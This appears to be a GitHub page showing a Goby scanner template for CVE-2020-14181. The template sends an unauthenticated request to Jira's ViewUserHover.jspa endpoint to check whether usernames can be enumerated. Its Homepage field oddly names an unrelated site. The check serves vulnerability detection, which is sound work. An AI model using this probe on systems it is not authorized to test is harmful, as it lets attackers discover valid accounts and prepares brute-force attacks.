-
Notifications
You must be signed in to change notification settings - Fork 8
/
Atlassian_Jira_user_information_disclosure.json
53 lines (53 loc) · 2.23 KB
/
Atlassian_Jira_user_information_disclosure.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
{
"Name": "Atlassian Jira user information disclosure (CVE-2020-14181)",
"Level": "0",
"Tags": [
"Disclosure of Sensitive Information"
],
"GobyQuery": "(app=\"JIRA\" || title=\"System Dashboard\")",
"Description": "There is an unauthorized access vulnerability in JIRA. Unauthorized users can directly query the existence of a user name through an API interface. This interface is different from cve-2019-8446 and cve-2019-3403. It is a new interface. If JIRA is exposed to the public network, unauthorized users can directly access the interface",
"Product": "Atlassian Jira",
"Homepage": "https://pingcode.com/",
"Author": "PeiQi",
"Impact": "<p>Can be blasted user name, know the correct user name<br></p>",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech"
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/secure/ViewUserHover.jspa?username=peiqipeiqipeiqi",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "peiqipeiqipeiqi",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-04-04 20:57:19",
"GobyVersion": "1.8.255"
}